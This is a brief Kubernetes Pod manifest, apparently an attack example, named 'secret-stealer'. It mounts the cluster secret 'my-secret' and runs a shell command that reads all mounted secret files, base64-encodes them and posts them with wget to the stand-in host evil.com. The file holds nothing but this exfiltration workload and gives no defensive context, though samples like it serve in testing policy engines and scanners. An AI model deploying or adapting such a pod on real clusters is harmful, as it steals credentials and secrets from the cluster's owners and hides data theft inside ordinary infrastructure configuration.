apiVersion: v1
kind: Pod
metadata:
  name: secret-stealer
spec:
  containers:
  - name: exfil
    image: alpine
    command: ["sh", "-c", "cat /mnt/secrets/* | base64 | wget --post-data @- http://evil.com/exfil"]
    volumeMounts:
    - name: secrets
      mountPath: /mnt/secrets
  volumes:
  - name: secrets
    projected:
      sources:
      - secret:
          name: my-secret
